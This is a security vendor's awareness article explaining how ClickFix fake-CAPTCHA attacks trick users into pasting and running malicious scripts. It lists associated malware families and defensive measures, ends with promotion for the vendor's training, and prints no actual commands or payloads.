Resources

What is a ClickFix attack?

ClickFix is a type of social engineering attack that makes people run malware on their own without the attacker needing to use an exploit. It only takes a fake Captcha asking you to prove ‘you’re not a robot’ and a few keystrokes. That's what makes it so effective and so dangerous.

Arsen Team
3 minutes read
What is a ClickFix attack?

ClickFix is a social engineering technique that tricks users into running malicious codes on their own computers. ClickFix attacks do not require an exploit or a software vulnerability. All it takes is a fictitious Captcha asking you to prove ‘you’re not a robot’ and a few keystrokes. That's what makes it so effective and so dangerous.

First detected in April 2024, ClickFix has grown fast. According to ESET data, attacks using this method surged by 517% in 2025 alone. It's no longer a niche tactic used in targeted campaigns, it's a widespread threat hitting firms gloabally.

How a ClickFix Attack Works

The attack is built entirely on deception. Here's the typical sequence:

  1. The lure. The victim lands on a compromised or fake website, or receives a phishing email, and encounters a pop-up simulating a Captcha protection. It might look like a legitimate security check, or a CAPTCHA verification. The message is designed to feel urgent and legitimate.

  2. The "fix" button. The pop-up includes a button, often labeled Fix, How to fix, or Verify you're not a robot, that, when clicked, silently copies a malicious script to the user's clipboard.

  3. The three keystrokes. The user can then be guided to:

    • Press Win + R to open the Windows Run dialog
    • Press Ctrl + V to paste the (invisible) script
    • Press Enter to execute it

ClickFix Delivery Methods

That's it. The user has just run malware on their own machine, with their own privileges, without any warning from the operating system. The name "ClickFix" comes from that "fix" call to action, though not every variant uses one. Some campaigns skip it entirely and frame the interaction as a bot check or a security verification.

What Happens After the Click?

Once the script runs, a malicious payload is downloaded and installed. The specific malware varies by campaign, but ClickFix has been linked to some well-known families: Lumma Stealer, AsyncRAT, XWorm, VenomRAT, DanaBot, and NetSupport RAT, among others.

Depending on the payload, attackers can:

  • Steal credentials: passwords, session tokens, banking information
  • Log keystrokes: capturing everything the user types
  • Deploy ransomware: encrypting files and demanding payment
  • Establish persistent access: installing backdoors for long-term control
  • Move laterally: spreading to other devices on the same network

Because the user initiates the command themselves, many traditional security tools don't flag it. The execution looks like a normal user action.

Why ClickFix Is So Hard to Stop

Unlike phishing attacks that rely on a user clicking a malicious link or opening a malicious attachment, ClickFix weaponizes the user's own trust and helpfulness. The victim isn't "tricked into downloading malware"; they run it themselves, following what appear to be reasonable troubleshooting steps, they are used to do already.

This also means it bypasses a lot of automated defenses. There's no email attachment to scan, no suspicious download to flag. The malicious command arrives via the clipboard and is executed by the user, not by any automated process.

ClickFix can also be used in different delivery situations. For example, a "standard" phishing email will lead victims to a fake landing page with the ClickFix prompt. It could be a fake Google Meet link, a fake Calendar invite, a drive link, or even messages on social media. That flexibility makes it easy to change.

ClickFix Exemple

How to Protect Against ClickFix Attacks

ClickFix is fundamentally a human problem, which means the primary defense is human awareness. Technical controls help, but they're not enough on their own.

For organizations:

  1. Train employees on social engineering tactics, including ClickFix scenarios. This is the single most effective defense.
  2. Restrict the Windows Run dialog via Group Policy Objects (GPOs) to limit exposure.
  3. Block or monitor clipboard-based command execution through Windows Event logging.
  4. Restrict execution of mshta.exe and PowerShell from user directories.
  5. Deploy endpoint detection and response (EDR) solutions capable of catching post-execution behavior. Properly configured EDRs also help stop the most common ClickFix attacks.
  6. mplement MFA so that even stolen credentials can't immediately be used.
  7. Keep browsers and operating systems up to date.

For individuals:

  1. Be suspicious of any webpage or pop-up asking you to press keyboard shortcuts.
  2. Never paste content into a Run dialog or terminal if a website told you to.
  3. Treat any "fix" prompt involving Win + R as a red flag.
## No single control eliminates the risk.

ClickFix succeeds because it chains together several small, individually reasonable-looking steps. Defense requires the same layered approach. With Arsen, you can trainon social engineering tactics, including ClickFix scenarios. This is the single most effective defense

Learn more about our ClickFix attack simulations scenarios →

Book a demo

Découvrez pourquoi Arsen est la plateforme de référence pour aider les RSSI, experts cyber et équipes IT à protéger leur organisation contre l'ingénierie sociale.

Request a demo

Frenquently Asked Questions

ClickFix is a cyberattack technique that tricks users into running malware themselves, by convincing them they're fixing a technical problem. The victim is guided through a few keystrokes; opening a Run dialog, pasting a script, pressing Enter, without realizing they're executing malicious code.

Because it bypasses most automated security tools by having the user run the malicious command, rather than triggering an automated download or exploit. It exploits human psychology, the instinct to fix a problem quickly, rather than any technical vulnerability.

ClickFix has been used to deliver a range of malware, including infostealers like Lumma Stealer, remote access trojans like AsyncRAT and VenomRAT, ransomware loaders, and keyloggers. The payload depends on the specific campaign.

Anyone who uses the internet is potentially at risk. Campaigns have targeted hospitality staff, healthcare professionals, car dealership employees, and everyday users through fake CAPTCHAs and error pages. No industry or user type is immune.

Traditional phishing typically tries to get users to click a malicious link or open an infected attachment. ClickFix goes further: it convinces users to manually run a command. This makes it more difficult for email filters and antivirus tools to catch, since the delivery mechanism is the user's own actions.

The most effective protection is security awareness training. Employees who know what ClickFix looks like are far less likely to fall for it. Technical controls like disabling the Windows Run dialog, blocking mshta.exe, and deploying EDR solutions add important layers of defense, but education comes first.

Learn how Arsen helps firms to train employee against ClickFix threat vectors →

Continue reading